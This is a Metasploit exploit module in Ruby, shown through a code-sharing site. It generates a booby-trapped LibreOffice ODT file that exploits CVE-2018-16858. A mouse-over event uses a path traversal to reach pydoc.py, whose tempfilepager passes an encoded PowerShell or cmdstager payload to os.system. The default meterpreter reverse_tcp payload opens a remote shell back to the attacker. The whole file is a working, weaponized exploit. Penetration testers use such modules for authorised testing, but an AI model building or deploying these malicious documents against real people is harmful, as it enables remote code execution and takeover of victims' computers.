Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/fileformat/libreoffice_macro_exec.rb
19664 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::FILEFORMAT
10
include Msf::Exploit::Powershell
11
include Msf::Exploit::CmdStager
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'LibreOffice Macro Code Execution',
18
'Description' => %q{
19
LibreOffice comes bundled with sample macros written in Python and
20
allows the ability to bind program events to them. A macro can be tied
21
to a program event by including the script that contains the macro and
22
the function name to be executed. Additionally, a directory traversal
23
vulnerability exists in the component that references the Python script
24
to be executed. This allows a program event to execute functions from Python
25
scripts relative to the path of the samples macros folder. The pydoc.py script
26
included with LibreOffice contains the tempfilepager function that passes
27
arguments to os.system, allowing RCE.
28
29
This module generates an ODT file with a mouse over event that
30
when triggered, will execute arbitrary code.
31
},
32
'License' => MSF_LICENSE,
33
'Author' => [
34
'Alex Inführ', # Vulnerability discovery and PoC
35
'Shelby Pace' # Metasploit Module
36
],
37
'References' => [
38
[ 'CVE', '2018-16858' ],
39
[ 'URL', 'https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html' ]
40
],
41
'Platform' => [ 'win', 'linux' ],
42
'Arch' => [ ARCH_X86, ARCH_X64 ],
43
'Targets' => [
44
[
45
'Windows',
46
{
47
'Platform' => 'win',
48
'Arch' => [ ARCH_X86, ARCH_X64 ],
49
'Payload' => 'windows/meterpreter/reverse_tcp',
50
'DefaultOptions' => { 'PrependMigrate' => true }
51
}
52
],
53
[
54
'Linux',
55
{
56
'Platform' => 'linux',
57
'Arch' => [ ARCH_X86, ARCH_X64 ],
58
'Payload' => 'linux/x86/meterpreter/reverse_tcp',
59
'DefaultOptions' => { 'PrependFork' => true },
60
'CmdStagerFlavor' => 'printf',
61
}
62
]
63
],
64
'DisclosureDate' => "2018-10-18",
65
'DefaultTarget' => 0,
66
'Notes' => {
67
'Reliability' => UNKNOWN_RELIABILITY,
68
'Stability' => UNKNOWN_STABILITY,
69
'SideEffects' => UNKNOWN_SIDE_EFFECTS
70
}
71
)
72
)
73
74
register_options(
75
[
76
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt'])
77
]
78
)
79
end
80
81
def gen_windows_cmd
82
opts =
83
{
84
:remove_comspec => true,
85
:method => 'reflection',
86
:encode_final_payload => true
87
}
88
@cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, opts)
89
@cmd << ' &amp;&amp; echo'
90
end
91
92
def gen_linux_cmd
93
@cmd = generate_cmdstager.first
94
@cmd << ' &amp;&amp; echo'
95
end
96
97
def gen_file(path)
98
text_content = Rex::Text.rand_text_alpha(10..15)
99
100
# file from Alex Inführ's PoC post referenced above
101
fodt_file = File.read(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-16858', 'librefile.erb'))
102
libre_file = ERB.new(fodt_file).result(binding())
103
libre_file
104
rescue Errno::ENOENT
105
fail_with(Failure::NotFound, 'Cannot find template file')
106
end
107
108
def exploit
109
path = '../../../program/python-core-3.5.5/lib/pydoc.py'
110
if datastore['TARGET'] == 0
111
gen_windows_cmd
112
elsif datastore['TARGET'] == 1
113
gen_linux_cmd
114
else
115
fail_with(Failure::BadConfig, 'A formal target was not chosen.')
116
end
117
fodt_file = gen_file(path)
118
119
file_create(fodt_file)
120
end
121
end
122
123